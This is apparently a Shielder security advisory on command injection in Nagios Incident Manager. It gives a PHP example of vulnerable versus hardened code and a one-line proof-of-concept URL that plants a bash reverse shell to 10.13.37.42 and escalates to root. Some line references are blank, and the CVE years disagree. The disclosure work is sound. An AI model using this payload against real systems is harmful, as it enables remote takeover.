A Command Injection vulnerability in Nagios Incident Manager (component of Nagios XI) before 2.2.7 allows authenticated attackers to achieve remote code execution via a malicious
“Resolve network incidents, collaborate with team members, and track incident history”. For more information visit https://www.nagios.com/products/nagios-incident-manager/.
The Nagios XI API allows interaction with Nagios IM through the file /nagiosxi/includes/components/nagiosim/nagiosim.php.
At , the host variable is read from the database query shown in CVE-2020-9204. At , it is used in a command string without sanitization or validation. At , the assembled command is run.
An authenticated attacker can achieve Remote Code Execution through a malicious host record in a network incident.
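The pattern described above, as an added illustration that is not the Nagios IM source: a helper that runs a network command against the host of an incident record, first in the vulnerable form (the database value spliced straight into the command) and then hardened with an allow-list check and shell quoting. The function names, the `host` column and the `ping` command are assumptions.

```php
<?php
// Added illustration, not Nagios code. Both functions take a database row
// (an associative array) and run a command against its "host" column.

// Vulnerable pattern: the host value comes straight from the database row
// and is concatenated into the command string, so a record whose host
// contains shell metacharacters runs arbitrary commands as the web user.
function check_host_vulnerable(array $incident): string
{
    $host = $incident['host'];            // attacker-controlled via the DB
    $cmd  = "ping -c 1 " . $host;         // no validation, no quoting
    return shell_exec($cmd) ?? '';
}

// Hardened pattern: accept only a plausible IP address or hostname, then
// quote the argument so the shell treats it as a single word.
function check_host_hardened(array $incident): string
{
    $host = (string) ($incident['host'] ?? '');

    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $label   = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $is_name = strlen($host) <= 253
        && preg_match('/^' . $label . '(\.' . $label . ')*$/', $host) === 1;
    if (!$is_ip && !$is_name) {
        throw new InvalidArgumentException('host is not a valid hostname or IP address');
    }

    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // quotes; with the allow-list above, characters such as ';', '|' or '$('
    // are rejected before they could reach the shell at all.
    $cmd = 'ping -c 1 ' . escapeshellarg($host);
    return shell_exec($cmd) ?? '';
}

// Constructed sample records for a manual check (not real incident data).
$benign    = ['host' => 'monitor.example.internal'];
$malicious = ['host' => '127.0.0.1; id'];   // constructed injection attempt

try {
    check_host_hardened($malicious);        // rejected by the allow-list
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . PHP_EOL;
}
echo check_host_hardened($benign);
```

A detection-side corollary: a host column that matches neither `FILTER_VALIDATE_IP` nor the hostname grammar is itself a useful audit signal for tampered incident records.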
Note: this PoC exploits CVE-2019-9204, CVE-2019-9166 and CVE-2019-9203 too to achieve root remote code execution.
[host]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=1'UNION%20select%201,2,3,4,"';echo%20'print(\"bash+-i+>%26+/dev/tcp/10.13.37.42/8080+0>%261+%23\")%3b'>>+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x
using the logged-in session
An authenticated attacker can take control of Nagios XI.
Upgrade to Nagios IM 2.2.7 or later. (Note: we didn’t verify the patch.)
This report was subject to Shielder’s disclosure policy:
`polict` of Shielder
This advisory was first published on https://www.shielder.com/advisories/nagiosim-host-remote-code-execution/
10 April 2019